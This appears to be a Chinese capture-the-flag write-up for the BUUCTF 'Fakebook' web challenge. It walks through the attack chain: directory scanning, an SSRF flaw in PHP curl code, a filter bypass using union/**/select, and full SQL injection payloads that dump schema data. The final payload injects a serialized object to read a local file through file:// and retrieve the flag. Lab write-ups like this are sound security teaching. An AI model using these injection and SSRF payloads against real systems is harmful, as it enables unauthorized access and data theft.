首页 > 数据库 >buuctf-web方向--ssrf+sql+dirscan

buuctf-web方向--ssrf+sql+dirscan

时间:2023-01-10 22:11:55浏览次数:70  
标签:web buuctf name ssrf no blog flag ch

[网鼎杯 2018]Fakebook
首先,扫描该网站
利用dirsearch进行扫描获取robot.txt,从中发现源码备份/user.php.bak下载后可读取源码

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = **curl_exec**($ch);//由此发现存在ssrf注入
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

由curf_exec()发现存在ssrf注入(关于ssrf参考 https://blog.csdn.net/qq_48904485/article/details/123653514

之后,注册(join)一个账号,注意此处blog指blog网址,需要填一个网址的格式。
返回后发现,增加了注册信息

点进去后发现有一处传参点

查看源代码后也没有找到相关提示,但是发现一个可能存在为协议读取的可能

赋值该链接后的内容,进行base64解密,发现是百度页面的html码,

猜测最终可以从这里读取flag文件
尝试对该传参点进行注入,输入 no=1 and 1=1#后输出正常,

但是输入1 and 1=2#后出现报错

所以存在数字型注入

修改paylod 利用 order by 确定列数为4,on=1 order by 4#

而后尝试用select进行查询出现报错,测试后发现是对select进行了过滤,后来尝试利用updatexml,show database等方法均被过滤

考虑用handler句柄进行读取,但是读不到数据库名,放弃,后来查询题解后发现可以用 no=1 union/**/select 1,2,3,4#进行绕过
详细参考 https://blog.csdn.net/weixin_45785288/article/details/109680228 第八点

而后按照正常的爆破方式进行爆破尽可以查询到flag
后续的payload如下
no=0%20union//select%201,database(),3,4# 得到库名 fakebook
no=0%20union/
/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()# 得到表名 user
no=0%20union//select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27#
得到以下列名

其他的都可以理解,其中data不明白是什么可以进行查询试试
?no=0 union/
/select 1,data,3,4 from users
得到了一下序列化后的对象

利用ssrf进行读取flag
/view.php?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

由链接获取到flag的base64值,解密获取值

成功获取flag

标签:web,buuctf,name,ssrf,no,blog,flag,ch
From: https://www.cnblogs.com/zz-gy/p/17041507.html

相关文章

  • 【Azure 环境】移动应用 SSO 登录AAD, MSAL的配置为Webview模式时登录页面无法加载
    问题描述移动端集成MASL登录过程中,配置文件中配置项“authorization_user_agent”使用“DEFAULT”可以正常登录,但是改为“WEBVIEW”后就无法登陆,一直处于Loading状态。参......
  • webpack进阶
    ##loaderloader用于转换某些类型的模块loader用于对某些导入的资源进行特定处理例如cssimage...###原理loader本质上是一个函数###手写一个babelLoa......
  • Web前端高频面试题全解析记录
    ##var变量提升var申明的变量会被提升到当前作用域的最顶端所谓作用域是`function`这样的函数才算是,`if``else``for`等带`{}`的是没有作用域的无论嵌套多少......
  • Web 控件定位与常见操作
    在做Web自动化时,最根本的就是操作页面上的元素,首先要能找到这些元素,然后才能操作这些元素。工具或代码无法像测试人员一样用肉眼来分辨页面上的元素。那么要如何定位到这......
  • web自动化测试-文件上传与弹框处理
    实战演示文件上传input标签使用自动化上传,先定位到上传按钮,然后send_keys把路径作为值给传进去.如图所示,是企业微信文件上传的页面定位到标签为input,type为file的元......
  • 用PCS建立WEB集群,一直不生效怎么解决!
    心累,耗了我2天时间才解决。[root@rs1~]#pcsresourcecreateWebsiteocf......
  • Centos7.7下建立无共享存储的WEB集群(pcs+pacemaker+corosync)
    规划设计操作系统安装群集组件安装群集节点准备2创建VIP资源3创建Web/Apache资源4配置约束5群集测试1.准备工作(重要)群集组件和节点的准备我在另一张博客中已经介绍,可以参考......
  • 基于NFS存储建立WEB群(PCS工具)
    实现NFS共享存储的WEB群集,前提是建立好web群集这是我另一篇建立web群集的博客:基于NFS服务器的WEB群集原理可以根据这个图片来理解这个原理,我在web1上有照片,但是我web2没有,......
  • 从webview跳转到小程序报错,'wx' is not defined
    项目有一个需求是从h5中跳转回小程序里,在小程序内报了这个错误'wx'isnotdefined尝试了下面两种方法都没有用npminstallweixin-js-sdk,使用这个包没有效果<scr......
  • [项目源码] JavaWeb校园宿舍管理系统
     jsp校园宿舍管理系统源码,采用Servlet+JSP+MySQL。包含数据库文件,界面采用bootstrap,简洁大方。      项目导入eclipse后的目录结构如下: 关注下面公众号,下载源码原......